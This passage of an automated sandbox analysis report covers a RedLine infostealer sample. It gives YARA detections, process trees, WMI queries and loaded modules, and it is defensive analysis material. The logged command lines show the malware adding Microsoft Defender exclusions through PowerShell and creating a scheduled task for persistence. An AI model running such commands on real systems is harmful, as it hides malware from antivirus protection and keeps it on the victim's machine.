                    Source: PzPxqbK89H.exe, 00000000.00000002.1738554114.0000000005CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735276217.000000000344C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exe, 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exeBinary or memory string: OriginalFilenameDBNj.exe8 vs PzPxqbK89H.exe
                    Source: PzPxqbK89H.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PzPxqbK89H.exe.44417b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PzPxqbK89H.exe.44417b0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 8.2.PzPxqbK89H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 8.2.PzPxqbK89H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PzPxqbK89H.exe.44417b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PzPxqbK89H.exe.44417b0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: PzPxqbK89H.exe PID: 7260, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: PzPxqbK89H.exe PID: 7792, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: VzwumYUBCtHW.exe PID: 7932, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: PzPxqbK89H.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: VzwumYUBCtHW.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, TDwrK4xy1eTvVE6hUY.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, TDwrK4xy1eTvVE6hUY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, TDwrK4xy1eTvVE6hUY.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, rmnWLDrgkGS2GSn6Lw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, rmnWLDrgkGS2GSn6Lw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, TDwrK4xy1eTvVE6hUY.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, TDwrK4xy1eTvVE6hUY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, TDwrK4xy1eTvVE6hUY.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/103@1/1
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile created: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMutant created: \Sessions\1\BaseNamedObjects\memhIrAvtBzAqd
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile created: C:\Users\user\AppData\Local\Temp\tmpBC1E.tmpJump to behavior
                    Source: PzPxqbK89H.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PzPxqbK89H.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tmp4F5D.tmp.14.dr, tmp8832.tmp.14.dr, tmp8842.tmp.14.dr, tmp63FD.tmp.8.dr, tmp9D01.tmp.8.dr, tmp9D13.tmp.8.dr, tmp8843.tmp.14.dr, tmp4F5C.tmp.14.dr, tmp8831.tmp.14.dr, tmp9D12.tmp.8.dr, tmp9CE1.tmp.8.dr, tmp9D02.tmp.8.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: PzPxqbK89H.exeReversingLabs: Detection: 60%
                    Source: PzPxqbK89H.exeVirustotal: Detection: 60%
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile read: C:\Users\user\Desktop\PzPxqbK89H.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PzPxqbK89H.exe "C:\Users\user\Desktop\PzPxqbK89H.exe"
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Users\user\Desktop\PzPxqbK89H.exe "C:\Users\user\Desktop\PzPxqbK89H.exe"
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpE438.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess created: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Users\user\Desktop\PzPxqbK89H.exe "C:\Users\user\Desktop\PzPxqbK89H.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpE438.tmp"
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess created: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
